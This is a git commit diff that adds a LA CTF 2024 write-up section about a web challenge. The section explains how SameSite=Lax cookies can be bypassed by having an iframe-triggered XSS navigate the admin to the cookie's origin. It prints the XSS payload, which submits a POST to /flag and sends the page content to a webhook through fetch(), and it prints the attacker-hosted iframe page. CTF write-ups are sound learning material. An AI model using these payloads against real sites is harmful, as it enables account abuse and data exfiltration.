feat: update la ctf

Author: PSDat123

_posts/2024-02-19-LA-CTF-2024.md

@@ -427,6 +427,34 @@ Reference:
   
 {% include embed/youtube.html id='ewXEEneicQQ' %}
 
+So the challenge is based around the property of `Lax` cookie. According to the [documentation](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie#lax). `Lax` cookies can't be sent through iframe or img tag. But will be sent if the site navigated the user to the site that the cookie belongs to.
+
+In the challenge, only the user that have not login (have no cookie) can trigger the XSS through the `/view` endpoint. But in order to get the flag, the admin user have to sent a POST request to `/flag` with the admin cookie in it.
+
+One way to do it was to let the admin user trigger the XSS through an `iframe` where the cookie is not sent. And the XSS navigate the admin to the cookie's origin, in this case `ctf-wiki.chall.lac.tf`, and the cookie will be sent with the request. After the admin user have navigate to the cookie's origin, we can change the page content via the XSS payload to send a POST request to `/flag` to get the flag and exfiltrate it.
+
+XSS payload:
+```html
+<script>
+let w = window.open('{url}/home');
+w.document.write(`<form action="/flag" method="POST" id="flag-form"></form>`);
+setTimeout(() => w.document.forms['flag-form'].submit(), 500);
+setTimeout(() => fetch('{webhook}', { method: 'POST', mode: 'no-cors', body: JSON.stringify({ content: w.document.body.innerHTML })}), 1500);
+</script>
+```
+
+Payload on the attacker server to trigger XSS via `iframe`, the bot will visit this page.
+```html
+<!DOCTYPE html>
+<html>
+<head>
+    <title>PBR | UCLA</title> 
+</head>
+<body>
+    <iframe src="https://ctf-wiki.chall.lac.tf/view/{xss_id}"></iframe>
+</body>
+</html>
+```
 
 ## quickstyle
 Reference: